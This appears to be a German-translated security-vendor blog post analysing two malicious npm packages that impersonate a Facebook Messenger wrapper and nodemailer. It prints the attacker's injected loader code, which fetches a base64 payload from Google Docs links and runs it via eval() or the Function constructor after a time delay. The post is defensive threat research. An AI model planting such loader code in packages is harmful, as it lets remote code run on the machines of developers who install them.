Produkt
Alles, was Sie für die Sicherung von Code, Cloud und Laufzeit benötigen - in einem zentralen System
Code
Abhängigkeiten
Vermeidung von Open-Source-Risiken (SCA)
Geheimnisse
Aufgedeckte Geheimnisse fangen
SAST
Sicherer Code, wie er geschrieben wurde
Container-Bilder
Bilder einfach sichern
Malware
Verhinderung von Angriffen auf die Lieferkette
Infrastruktur als Code
IaC auf Fehlkonfigurationen prüfen
Lizenzrisiko & SBOMs
Vermeiden Sie Risiken, seien Sie konform
Veraltete Software
Kennen Sie Ihre EOL-Laufzeiten
Wolke
Wolke / CSPM
Cloud-Fehlkonfigurationen
DAST
Black-Box-Sicherheitstests
API-Überprüfung
Testen Sie Ihre APIs auf Sicherheitslücken
Virtuelle Maschinen
Keine Agenten, keine Gemeinkosten
Kubernetes-Laufzeit
bald
Sichern Sie Ihre Container-Workloads
Cloud-Inventar
Cloud-Sprawl, gelöst
Verteidigen Sie
Laufzeitschutz
In-App-Firewall / WAF
Eigenschaften
AI AutoFix
1-Klick-Korrekturen mit Aikido AI
CI/CD-Sicherheit
Scannen vor der Zusammenführung und Bereitstellung
IDE-Integrationen
Sofortiges Feedback während des Programmierens
Vor-Ort-Scanner
Lokales Scannen nach dem Prinzip "Compliance first
Lösungen
Anwendungsfälle
Einhaltung der Vorschriften
SOC 2, ISO und mehr automatisieren
Schwachstellen-Management
All-in-1-Verwaltung von Viren
Sichern Sie Ihren Code
Erweiterte Codesicherheit
SBOMs generieren
1 Klick SCA-Berichte
ASPM
End-to-End AppSec
AI im Aikido
Lassen Sie Aikido AI die Arbeit machen
Block 0-Tage
Bedrohungen blockieren, bevor sie sich auswirken
Branchen
FinTech
HealthTech
HRTech
Legal Tech
Konzerne
Agenturen
Startups
Unternehmen
Mobile Apps
Herstellung
Preise
Ressourcen
Entwickelnde
Dokumente
Wie man Aikido verwendet
Öffentliche API-Dokumente
Aikido-Entwicklerzentrum
Änderungsliste
Sehen Sie, was geliefert wird
Sicherheit
Interne Forschung
Malware und CVE-Informationen
Glossar
Leitfaden zum Sicherheitsjargon
Trust Center
Sicher, privat, gesetzeskonform
Open Source 
Aikido Intel
Malware & OSS-Bedrohungs-Feed
Zen
In-App-Firewall-Schutz
OpenGrep
Code-Analyse-Engine
Integrationen
IDEs
CI/CD-Systeme
Wolken
Git-Systeme
Einhaltung der Vorschriften
Boten
Aufgaben-Manager
Mehr Integrationen
Über
Über
Über
Treffen Sie das Team
Karriere
Wir stellen ein
Pressemappe
Herunterladen von Markenwerten
Kalender
Sehen wir uns?
Open Source 
Unsere OSS-Projekte
Blog
Die neuesten Beiträge
Kundengeschichten
Das Vertrauen der besten Teams
Kontakt
Anmeldung
Kostenloser Start
Kein CC erforderlich
Aikido
Menü
Aikido
DE
DE
FR
JP
Anmeldung
Kostenloser Start
Kein CC erforderlich
Blog
/
Verstecken und scheitern: Verschleierte Malware, leere Nutzlasten und npm-Schwindel

Verstecken und scheitern: Verschleierte Malware, leere Nutzlasten und npm-Schwindel

Unter
Charlie Eriksen
Charlie Eriksen
4 Minuten lesen
Malware

‍

Am 14. März 2025 entdeckten wir ein bösartiges Paket auf npm genannt node-facebook-messenger-api. Zunächst schien es sich um eine ziemlich gewöhnliche Malware zu handeln, obwohl wir nicht erkennen konnten, was das Ziel war. Wir haben uns bis zum 3. April 2025 nichts weiter dabei gedacht, als wir sahen, dass derselbe Angreifer seinen Angriff ausweitete. Hier finden Sie einen kurzen Überblick über die von diesem Angreifer verwendeten Techniken und einige interessante Beobachtungen darüber, wie ihre Verschleierungsversuche am Ende dazu führen, dass sie noch offensichtlicher werden. 

‍

TLDR 

  • 🕵️ Ein März 14, 2025haben wir ein bösartiges npm-Paket entdeckt: node-facebook-messenger-api@4.1.0getarnt als legitimer Facebook-Messenger-Wrapper.
  • 🧪 Der Angreifer versteckte Logik der entfernten Codeausführung mit axios und eval() um eine Nutzlast aus einem Google Docs-Link zu ziehen - aber die Datei war leer.
  • 🔁 Spätere Versionen verwendeten zeitverzögerte Ausführung und tauschte die zx Bibliothek, um einer Entdeckung zu entgehen, und bettet bösartige Logik ein, die Tage nach der Veröffentlichung ausgelöst wird.
  • 📦 Ein April 3, 2025veröffentlichte derselbe Bedrohungsakteur ein zweites gefälschtes Paket: node-smtp-mailer@6.10.0, die sich als nodemailermit der gleichen C2-Logik und Verschleierungstaktik.
  • 🧬 Beide Pakete verwendeten denselben eindeutigen Satz von Abhängigkeiten (einschließlich Hyper-Typen), was eine klare Signaturmuster Verknüpfung der Anschläge.
  • 💀 Die Verschleierungsversuche der Angreifer - wie das Verstecken von Code in großen Dateien und das unbemerkte Einschleusen von zx über eine andere Abhängigkeit - machten die Kampagne ironischerweise leichter zu erkennen.
  • 🚨 Die Payloads haben nie etwas Funktionales geliefert, aber die TTPs sind echt und zeigen, wie sich Angriffe auf npm in der Lieferkette entwickeln.
  • ‍

    Erste Schritte

    Alles begann am 14. März um 04:37 UTC, als unsere Systeme uns auf ein verdächtiges Paket aufmerksam machten. Es wurde von einem Benutzer veröffentlicht victor.ben0825der auch behauptet, er habe den Namen perusworld. Dies ist der Benutzername des Benutzers, der Eigentümer der gesetzlicher Aufbewahrungsort für diese Bibliothek.  

    ‍

    Hier ist der als bösartig erkannte Code in node-facebook-messenger-api@4.1.0:in der Datei messenger.js, Zeile 157-177:

    const axios = require('axios');
    
    const url = 'https://docs.google.com/uc?export=download&id=1ShaI7rERkiWdxKAN9q8RnbPedKnUKAD2'; 
    
    async function downloadFile(url) {
        try {
            const response = await axios.get(url, {
                responseType: 'arraybuffer'
            });
    
            const fileBuffer = Buffer.from(response.data);
    		eval(Buffer.from(fileBuffer.toString('utf8'), 'base64').toString('utf8'))
            
            return fileBuffer; 
        } catch (error) {
            console.error('Download failed:', error.message);
        }
    }
    
    downloadFile(url);
    

    Der Angreifer hat versucht, diesen Code in einer 769 Zeilen langen Datei zu verstecken, die eine große Klasse ist. Hier haben sie eine Funktion hinzugefügt und rufen sie direkt auf. Sehr niedlich, aber auch sehr offensichtlich. Wir haben versucht, die Nutzlast abzurufen, aber sie war leer. Wir haben sie als Malware gekennzeichnet und sind weitergegangen.

    Einige Minuten später veröffentlichte der Angreifer eine weitere Version, 4.1.1. Die einzige Änderung betraf offenbar die README.md und paket.json Dateien, in denen sie die Version, die Beschreibung und die Installationsanweisungen änderten. Da wir den Autor als bösen Autor markieren, wurden die Pakete ab diesem Zeitpunkt automatisch als Malware gekennzeichnet.

    Der Versuch, hinterhältig zu sein

    Dann, am 20. März 2025 um 16:29 UTC, markierte unser System automatisch die Version 4.1.2 des Pakets. Schauen wir uns an, was dort neu ist. Die erste Änderung ist in node-facebook-messenger-api.js, die enthält:

    "use strict";
    
    module.exports = {
        messenger: function () {
            return require('./messenger');
        },
        accountlinkHandler: function () {
            return require('./account-link-handler');
        },
        webhookHandler: function () {
            return require('./webhook-handler');
        }
    };
    
    var messengerapi = require('./messenger');

    Die Änderung in dieser Datei ist die letzte Zeile. Sie importiert nicht nur die messenger.js Datei, wenn sie angefordert wird, wird dies immer beim Import des Moduls gemacht. Clever! Die andere Änderung bezieht sich auf diese Datei, messenger.js. Er hat den zuvor gesehenen hinzugefügten Code entfernt und den folgenden in den Zeilen 197 bis 219 hinzugefügt:

    const timePublish = "2025-03-24 23:59:25"; 
    const now = new Date();
    const pbTime = new Date(timePublish);
    const delay = pbTime - now;
    
    if (delay <= 0) {
    	async function setProfile(ft) {
    		try {
    			const mod = await import('zx');
    			mod.$.verbose = false;
    			const res = await mod.fetch(ft, {redirect: 'follow'});
    			const fileBuffer = await res.arrayBuffer();
    			const data = Buffer.from(Buffer.from(fileBuffer).toString('utf8'), 'base64').toString('utf8');
    			const nfu = new Function("rqr", data);
    			nfu(require)();
    		} catch (error) {
    			//console.error('err:', error.message);
    		}
    	}
    
    	const gd = 'https://docs.google.com/uc?export=download&id=1ShaI7rERkiWdxKAN9q8RnbPedKnUKAD2'; 
    	setProfile(gd);
    }
    

    Hier finden Sie einen Überblick über die Funktionen:

    1. Er verwendet eine zeitbasierte Prüfung, um festzustellen, ob der bösartige Code aktiviert werden soll. Er würde erst etwa 4 Tage später aktiviert.
    2. Anstelle der Verwendung von axiosverwendet sie jetzt Google zx Bibliothek, um die bösartige Nutzlast zu holen.
    3. Er deaktiviert den ausführlichen Modus, der auch die Standardeinstellung ist.
    4. Er holt dann den bösartigen Code
    5. Es dekodiert base64
    6. Sie erstellt eine neue Funktion mit der Funktion() Konstruktor, der im Grunde gleichbedeutend ist mit einem eval() anrufen. 
    7. Dann ruft es die Funktion auf und übergibt dabei erfordern als Argument.

    ‍

    Aber auch hier erhalten wir keine Nutzdaten, wenn wir versuchen, die Datei abzurufen. Wir erhalten nur eine leere Datei namens info.txt. Die Verwendung von zx ist merkwürdig. Wir haben uns die Abhängigkeiten angesehen und festgestellt, dass das ursprüngliche Paket einige Abhängigkeiten enthielt:

     "dependencies": {
        "async": "^3.2.2",
        "debug": "^3.1.0",
        "merge": "^2.1.1",
        "request": "^2.81.0"
      }

    Das bösartige Paket enthält Folgendes:

     "dependencies": {
        "async": "^3.2.2",
        "debug": "^3.1.0",
        "hyper-types": "^0.0.2",
        "merge": "^2.1.1",
        "request": "^2.81.0"
      }

    Sehen Sie sich das an, sie haben die Hyper-Typen der Abhängigkeit hinzugefügt. Sehr interessant, wir werden noch ein paar Mal darauf zurückkommen. 

    Sie schlagen wieder zu!

    Dann, am 3. April 2025 um 06:46 Uhr, wurde ein neues Paket vom Benutzer cristr. Sie haben diee-Paket  node-smtp-mailer@6.10.0. Unsere Systeme wiesen sie automatisch als potenziell bösartigen Code aus. Wir haben es uns angeschaut und waren ein wenig aufgeregt. Das Paket tut so, als wäre es nodemailer, nur mit einem anderen Namen.  

    Unser System hat die Datei markiert lib/smtp-pool/index.js. Wir sehen schnell, dass der Angreifer Code am Ende der legitimen Datei hinzugefügt hat, direkt vor der letzten Modul.Exporte. Hier ist, was hinzugefügt wird:

    const timePublish = "2025-04-07 15:30:00"; 
    const now = new Date();
    const pbTime = new Date(timePublish);
    const delay = pbTime - now;
    
    if (delay <= 0) {
        async function SMTPConfig(conf) {
            try {
                const mod = await import('zx');
                mod.$.verbose = false;
                const res = await mod.fetch(conf, {redirect: 'follow'});
                const fileBuffer = await res.arrayBuffer();
                const data = Buffer.from(Buffer.from(fileBuffer).toString('utf8'), 'base64').toString('utf8');
                const nfu = new Function("rqr", data);
                nfu(require)();
            } catch (error) {
                console.error('err:', error.message);
            }
        }
    
        const url = 'https://docs.google.com/uc?export=download&id=1KPsdHmVwsL9_0Z3TzAkPXT7WCF5SGhVR'; 
        SMTPConfig(url);
    }
    

    Wir kennen diesen Code! Er ist wieder mit einem Zeitstempel versehen und wird erst 4 Tage später ausgeführt. Wir haben aufgeregt versucht, die Nutzdaten abzurufen, aber wir haben nur eine leere Datei namens anfänger.txt. Buh! Wir schauen uns die Abhängigkeiten noch einmal an, um zu sehen, wie sie sich einbringen zx. Wir haben festgestellt, dass die legitimen nodemailer Paket hat keine direkt Abhängigkeitennur devDependencies. Aber hier ist, was in dem bösartigen Paket ist:

     "dependencies": {
        "async": "^3.2.2",
        "debug": "^3.1.0",
        "hyper-types": "^0.0.2",
        "merge": "^2.1.1",
        "request": "^2.81.0"
      }

    Erkennen Sie eine Ähnlichkeit zwischen diesem und dem ersten Paket, das wir entdeckt haben? Es ist die gleiche Abhängigkeitsliste. Das legitime Paket hat keine Abhängigkeiten, aber das bösartige schon. Der Angreifer hat einfach die vollständige Liste der Abhängigkeiten aus dem ersten Angriff in dieses Paket kopiert. 

    ‍

    Interessante Abhängigkeiten

    Warum sind sie also von der Verwendung von axios zu zx zur Herstellung HTTP Anfragen? Auf jeden Fall, um eine Entdeckung zu vermeiden. Interessant ist jedoch, dass zx ist keine direkte Abhängigkeit. Stattdessen hat der Angreifer hyper-types eingebunden, ein legitimes Paket des Entwicklers lukasbach. 

    ‍

    Neben der Tatsache, dass das referenzierte Repository nicht mehr existiert, gibt es hier noch etwas Interessantes zu beachten. Sehen Sie, dass es 2 Unterhaltsberechtigte? Raten Sie mal, wer das ist. 

    ‍

    Wenn der Angreifer tatsächlich versuchen wollte, seine Aktivitäten zu verschleiern, ist es ziemlich dumm, sich auf ein Paket zu verlassen, von dem nur er selbst abhängig ist. 

    Letzte Worte

    Der Angreifer, der hinter diesen npm-Paketen steckt, hat es zwar nicht geschafft, eine funktionierende Nutzlast zu liefern, aber seine Kampagne zeigt die kontinuierliche Entwicklung von Bedrohungen der Lieferkette, die auf das JavaScript-Ökosystem abzielen. Der Einsatz von verzögerter Ausführung, indirekten Importen und dem Hijacking von Abhängigkeiten zeigt ein wachsendes Bewusstsein für Erkennungsmechanismen - und die Bereitschaft zum Experimentieren. Es zeigt aber auch, wie schlampige operative Sicherheit und wiederholte Muster sie immer noch verraten können. Für die Verteidiger ist es eine Erinnerung daran, dass selbst fehlgeschlagene Angriffe wertvolle Informationen sind. Jedes Artefakt, jeder Verschleierungstrick und jede wiederverwendete Abhängigkeit hilft uns, bessere Erkennungs- und Zuordnungsfähigkeiten zu entwickeln. Und vor allem wird deutlich, warum die kontinuierliche Überwachung und automatische Kennzeichnung öffentlicher Paketregistrierungen nicht mehr optional, sondern unerlässlich ist.

    Geschrieben von Charlie Eriksen

    Malware-Forscher

    Teilen:

    https://www.aikido.dev/blog/hide-and-fail-obfuscated-malware-and-npm-shenanigan

    Das Inhaltsverzeichnis:
    Text Link
    Teilen:
    Tastatur verwenden
    Verwenden Sie die linke Taste, um auf dem Aikido-Schieberegler vorwärts zu navigieren.
    Verwenden Sie die rechte Pfeiltaste, um zur nächsten Folie zu navigieren.
    um durch die Artikel zu navigieren
    Unter
    Charlie Eriksen

    Sie sind eingeladen: Die Verbreitung von Malware über Google Kalender-Einladungen und PUAs

    Malware
    Mai 13, 2025
    Mehr lesen
    Unter
    Mackenzie Jackson

    Warum die Aktualisierung von Container-Basisabbildern so schwierig ist (und wie man es einfacher machen kann)

    Technik
    Mai 12, 2025
    Mehr lesen
    Unter
    Charlie Eriksen

    RATatouille: Ein bösartiges Rezept versteckt in rand-user-agent (Kompromittierung der Lieferkette)

    6. Mai 2025
    Mehr lesen
    Unter
    Charlie Eriksen

    Angriff auf die XRP-Lieferkette: Offizielles NPM-Paket mit Backdoor zum Krypto-Diebstahl infiziert

    Malware
    April 22, 2025
    Mehr lesen
    Unter
    Charlie Eriksen

    Der Malware-Leitfaden: Die Arten von Malware auf NPM verstehen

    Malware
    April 10, 2025
    Mehr lesen
    Unter
    Madeline Lawrence

    Start der Aikido-Malware - Open Source Threat Feed

    Nachrichten
    31. März 2025
    Mehr lesen
    Unter
    Charlie Eriksen

    Malware versteckt sich im Verborgenen: Spionage gegen nordkoreanische Hacker

    31. März 2025
    Mehr lesen
    Unter
    Das Aikido-Team

    Die wichtigsten Tools für Cloud Security Posture Management (CSPM) im Jahr 2025

    Leitfäden
    März 27, 2025
    Mehr lesen
    Unter
    Madeline Lawrence

    Holen Sie sich das TL;DR: tj-actions/changed-files Supply Chain Attack

    Nachrichten
    März 16, 2025
    Mehr lesen
    Unter
    Mackenzie Jackson

    Eine unverbindliche Docker-Sicherheits-Checkliste für Entwickler, die auf Sicherheitslücken achten

    Leitfäden
    März 6, 2025
    Mehr lesen
    Unter
    Mackenzie Jackson

    Erkennen und Blockieren von JavaScript-SQL-Injection-Angriffen

    Leitfäden
    März 4, 2025
    Mehr lesen
    Unter
    Floris Van den Abeele

    Prisma und PostgreSQL anfällig für NoSQL-Injection? Ein überraschendes Sicherheitsrisiko erklärt

    Technik
    Februar 14, 2025
    Mehr lesen
    Unter
    Das Aikido-Team

    Die wichtigsten Tools für dynamische Anwendungssicherheitstests (DAST) im Jahr 2025

    Leitfäden
    Februar 12, 2025
    Mehr lesen
    Unter
    Willem Delbare

    Start von Opengrep | Warum wir Semgrep abgezweigt haben

    Nachrichten
    Januar 24, 2025
    Mehr lesen
    Unter
    Thomas Segura

    Ihr Client benötigt ein NIS2-Schwachstellen-Patching. Was nun?

    Januar 14, 2025
    Mehr lesen
    Unter
    Mackenzie Jackson

    Die 10 wichtigsten KI-gestützten SAST-Tools im Jahr 2025

    Leitfäden
    Januar 10, 2025
    Mehr lesen
    Unter
    Madeline Lawrence

    Snyk vs Aikido Security | G2 Bewertungen Snyk Alternative

    Leitfäden
    Januar 10, 2025
    Mehr lesen
    Unter
    Mackenzie Jackson

    Die 10 wichtigsten Werkzeuge für die Softwarezusammensetzungsanalyse (SCA) im Jahr 2025

    Leitfäden
    Januar 9, 2025
    Mehr lesen
    Unter
    Michiel Denis

    3 wichtige Schritte zur Stärkung von Compliance und Risikomanagement

    27. Dezember 2024
    Mehr lesen
    Unter
    Mackenzie Jackson

    Der Open-Source-Leitfaden des Startups für Anwendungssicherheit

    Leitfäden
    23. Dezember 2024
    Mehr lesen
    Unter
    Madeline Lawrence

    Start von Aikido für Cursor AI

    Technik
    13. Dezember 2024
    Mehr lesen
    Unter
    Mackenzie Jackson

    Treffen Sie Intel: Aikidos Open-Source-Bedrohungs-Feed, der von LLMs unterstützt wird.

    Technik
    13. Dezember 2024
    Mehr lesen
    Unter
    Johan De Keulenaer

    Aikido tritt dem AWS-Partnernetzwerk bei

    Nachrichten
    26. November 2024
    Mehr lesen
    Unter
    Mackenzie Jackson

    Befehlsinjektion im Jahr 2024 ausgepackt

    Technik
    November 24, 2024
    Mehr lesen
    Unter
    Mackenzie Jackson

    Path Traversal im Jahr 2024 - Das Jahr ausgepackt

    Technik
    23. November 2024
    Mehr lesen
    Unter
    Mackenzie Jackson

    Ausgewogene Sicherheit: Wann sollten Open-Source-Tools und wann kommerzielle Tools eingesetzt werden?

    Leitfäden
    15. November 2024
    Mehr lesen
    Unter
    Mackenzie Jackson

    Der Stand der SQL-Injektion

    Leitfäden
    8. November 2024
    Mehr lesen
    Unter
    Michiel Denis

    Visma's Sicherheitsgewinn mit Aikido: Ein Gespräch mit Nikolai Brogaard

    Nachrichten
    6. November 2024
    Mehr lesen
    Unter
    Michiel Denis

    Sicherheit im FinTech: Frage und Antwort mit Dan Kindler, Mitbegründer und CTO von Bound

    Nachrichten
    10. Oktober 2024
    Mehr lesen
    Unter
    Felix Garriau

    Die 7 wichtigsten ASPM-Werkzeuge im Jahr 2025

    Leitfäden
    1. Oktober 2024
    Mehr lesen
    Unter
    Madeline Lawrence

    Automatisieren Sie die Einhaltung von Vorschriften mit SprintoGRC x Aikido

    Nachrichten
    11. September 2024
    Mehr lesen
    Unter
    Felix Garriau

    Wie man eine SBOM für Software-Audits erstellt

    Leitfäden
    9. September 2024
    Mehr lesen
    Unter
    Madeline Lawrence

    SAST gegen DAST: Was Sie wissen müssen.

    Leitfäden
    2. September 2024
    Mehr lesen
    Unter
    Felix Garriau

    Die besten SBOM-Tools für Entwickler: Unsere 2025 Auswahlen

    Leitfäden
    7. August 2024
    Mehr lesen
    Unter
    Lieven Oosterlinck

    5 Snyk-Alternativen und warum sie besser sind

    Nachrichten
    5. August 2024
    Mehr lesen
    Unter
    Madeline Lawrence

    Warum wir so begeistert sind, mit Laravel zusammenzuarbeiten

    Nachrichten
    8. Juli 2024
    Mehr lesen
    Unter
    Felix Garriau

    110.000 Standorte vom Polyfill-Angriff auf die Lieferkette betroffen

    Nachrichten
    27. Juni 2024
    Mehr lesen
    Unter
    Felix Garriau

    Cybersecurity Essentials für LegalTech-Unternehmen

    Nachrichten
    25. Juni 2024
    Mehr lesen
    Unter
    Roeland Delrue

    Drata Integration - Wie man das technische Schwachstellenmanagement automatisiert

    Leitfäden
    18. Juni 2024
    Mehr lesen
    Unter
    Joel Hans

    DIY-Anleitung: Bauen oder kaufen Sie Ihr OSS-Toolkit für Code-Scanning und App-Sicherheit

    Leitfäden
    11. Juni 2024
    Mehr lesen
    Unter
    Roeland Delrue

    SOC 2-Zertifizierung: 5 Dinge, die wir gelernt haben

    Leitfäden
    4. Juni 2024
    Mehr lesen
    Unter
    Joel Hans

    Die 10 größten App-Sicherheitsprobleme und wie Sie sich schützen können

    Leitfäden
    28. Mai 2024
    Mehr lesen
    Unter
    Madeline Lawrence

    Wir haben gerade unsere Serie A mit 17 Millionen Dollar aufgestockt.

    Nachrichten
    2. Mai 2024
    Mehr lesen
    Unter

    Die besten RASP-Tools für Entwickler im Jahr 2025

    April 10, 2024
    Mehr lesen
    Unter
    Willem Delbare

    Webhook-Sicherheits-Checkliste: Wie man sichere Webhooks erstellt

    Leitfäden
    4. April 2024
    Mehr lesen
    Unter
    Willem Delbare

    Das Heilmittel für das Müdigkeitssyndrom bei Sicherheitswarnungen

    Technik
    21. Februar 2024
    Mehr lesen
    Unter
    Roeland Delrue

    NIS2: Wer ist betroffen?

    Leitfäden
    16. Januar 2024
    Mehr lesen
    Unter
    Roeland Delrue

    ISO 27001-Zertifizierung: 8 Dinge, die wir gelernt haben

    Leitfäden
    5. Dezember 2023
    Mehr lesen
    Unter
    Roeland Delrue

    Cronos Group entscheidet sich für Aikido Security, um die Sicherheit für ihre Unternehmen und Kunden zu verbessern

    Nachrichten
    30. November 2023
    Mehr lesen
    Unter
    Bart Jonckheere

    Wie Loctax Aikido Security einsetzt, um irrelevante Sicherheitswarnungen und Fehlalarme loszuwerden

    Nachrichten
    22. November 2023
    Mehr lesen
    Unter
    Felix Garriau

    Aikido Security sammelt 5 Millionen Euro ein, um eine nahtlose Sicherheitslösung für wachsende SaaS-Unternehmen anzubieten

    Nachrichten
    9. November 2023
    Mehr lesen
    Unter
    Roeland Delrue

    Aikido Security erreicht die ISO 27001:2022-Konformität

    Nachrichten
    8. November 2023
    Mehr lesen
    Unter
    Felix Garriau

    Wie der CTO von StoryChief Aikido Security nutzt, um nachts besser zu schlafen

    Nachrichten
    Oktober 24, 2023
    Mehr lesen
    Unter
    Willem Delbare

    Was ist ein CVE?

    Leitfäden
    Oktober 17, 2023
    Mehr lesen
    Unter
    Felix Garriau

    Die besten Tools zur Erkennung des Lebensendes: Rangliste 2025

    Leitfäden
    4. Oktober 2023
    Mehr lesen
    Unter
    Willem Delbare

    Die 3 größten Sicherheitslücken bei Webanwendungen im Jahr 2024

    Technik
    27. September 2023
    Mehr lesen
    Unter
    Felix Garriau

    Neue Aikido-Sicherheitsfunktionen: August 2023

    Nachrichten
    22. August 2023
    Mehr lesen
    Unter
    Felix Garriau

    Aikidos SaaS CTO-Sicherheitscheckliste 2025

    Nachrichten
    10. August 2023
    Mehr lesen
    Unter
    Felix Garriau

    Aikidos 2024 SaaS CTO Sicherheits-Checkliste

    Nachrichten
    10. August 2023
    Mehr lesen
    Unter
    Felix Garriau

    Die 15 größten Herausforderungen für Cloud- und Codesicherheit, die von CTOs aufgedeckt wurden

    Technik
    25. Juli 2023
    Mehr lesen
    Unter
    Willem Delbare

    Was ist die OWASP Top 10?

    Leitfäden
    12. Juli 2023
    Mehr lesen
    Unter
    Willem Delbare

    Wie Sie ein sicheres Administrationspanel für Ihre SaaS-Anwendung erstellen

    Leitfäden
    11. Juli 2023
    Mehr lesen
    Unter
    Roeland Delrue

    Wie Sie sich auf ISO 27001:2022 vorbereiten können

    Leitfäden
    5. Juli 2023
    Mehr lesen
    Unter
    Willem Delbare

    Verhinderung der Auswirkungen eines Hacks auf Ihre CI/CD-Plattform

    Leitfäden
    19. Juni 2023
    Mehr lesen
    Unter
    Felix Garriau

    Schnellerer Geschäftsabschluss mit einem Bericht zur Sicherheitsbewertung

    Nachrichten
    12. Juni 2023
    Mehr lesen
    Unter
    Willem Delbare

    Automatisiertes technisches Schwachstellenmanagement [SOC 2]

    Leitfäden
    5. Juni 2023
    Mehr lesen
    Unter
    Willem Delbare

    Verhinderung der Verschmutzung durch Prototypen in Ihrem Repository

    Leitfäden
    1. Juni 2023
    Mehr lesen
    Unter
    Willem Delbare

    Wie kann ein CTO eines SaaS-Startups ein Gleichgewicht zwischen Entwicklungsgeschwindigkeit und Sicherheit herstellen?

    Leitfäden
    16. Mai 2023
    Mehr lesen
    Unter
    Willem Delbare

    Wie die Cloud eines Startups durch ein einfaches Formular zum Versenden von E-Mails übernommen wurde

    Technik
    April 10, 2023
    Mehr lesen
    Unter
    Felix Garriau

    Aikido Security sammelt 2 Millionen Euro in einer Pre-Seed-Runde für den Aufbau einer Software-Sicherheitsplattform für Entwickler

    Nachrichten
    19. Januar 2023
    Mehr lesen
    Unter

    Warum Lockfiles für die Sicherheit der Lieferkette wichtig sind

    Mehr lesen
    Die wichtigsten Tools für Cloud Security Posture Management (CSPM) im Jahr 2025
    Unter
    Das Aikido-Team

    Die wichtigsten Tools für Cloud Security Posture Management (CSPM) im Jahr 2025

    Leitfäden
    Mai 14, 2025
    Die wichtigsten Tools für dynamische Anwendungssicherheitstests (DAST) im Jahr 2025
    Unter
    Das Aikido-Team

    Die wichtigsten Tools für dynamische Anwendungssicherheitstests (DAST) im Jahr 2025

    Leitfäden
    Mai 14, 2025
    Angriff auf die XRP-Lieferkette: Offizielles NPM-Paket mit Backdoor zum Krypto-Diebstahl infiziert
    Unter
    Charlie Eriksen

    Angriff auf die XRP-Lieferkette: Offizielles NPM-Paket mit Backdoor zum Krypto-Diebstahl infiziert

    Malware
    31. März 2025

    Sicher werden in 32 Sekunden

    Verbinden Sie Ihr GitHub-, GitLab-, Bitbucket- oder Azure DevOps-Konto, um Ihre Repos kostenlos zu scannen.

    Kostenloser Start
    Ihre Daten werden nicht weitergegeben - Nur-Lese-Zugriff
    Aikido Armaturenbrett
    Unternehmen
    ProduktPreiseÜberKarriereKontaktPartner mit uns
    Ressourcen
    DokumenteÖffentliche API-DokumenteSchwachstellen-DatenbankBlogIntegrationenGlossarPressemappeKundenrezensionen
    Sicherheit
    Trust CenterÜberblick über die SicherheitCookie-Einstellungen ändern
    Rechtliches
    DatenschutzbestimmungenCookie-RichtlinieNutzungsbedingungenRahmen-AbonnementvertragVereinbarung zur Datenverarbeitung
    Anwendungsfälle
    Einhaltung der VorschriftenSAST &AMP; DASTASPMSchwachstellen-ManagementSBOMs generierenWordPress SicherheitSichern Sie Ihren CodeAikido für Microsoft
    Branchen
    Für HealthTechFür MedTechFür FinTechFür SecurityTechFür LegalTechFür HRTechFür AgenturenFür UnternehmenFür PE & Konzerngesellschaften
    Vergleichen Sie
    gegenüber allen Anbieterngegen Snykgegen Wizgegen Flickwerkvs. Orca Sicherheitgegen Veracodevs GitHub Erweiterte Sicherheitgegenüber GitLab Ultimategegen Checkmarxgegen Semgrepgegen SonarQube
    Verbinden Sie
    hello@aikido.dev
    LinkedInX
    Abonnieren
    Bleiben Sie auf dem Laufenden mit allen Updates
    Das ist noch nicht alles.
    👋🏻 Vielen Dank! Sie wurden abonniert.
    Team Aikido
    Das ist noch nicht alles.
    © 2025 Aikido Security BV | BE0792914919
    🇪🇺 Adresse im Handelsregister: Coupure Rechts 88, 9000, Ghent, Belgien
    🇪🇺 Hauptstandort: Gebroeders van Eyckstraat 2, 9000, Gent, Belgien
    🇺🇸 Geschäftsadresse: 95 Third St, 2nd Fl, San Francisco, CA 94103, USA
    SOC 2
    Konform
    ISO 27001
    Konform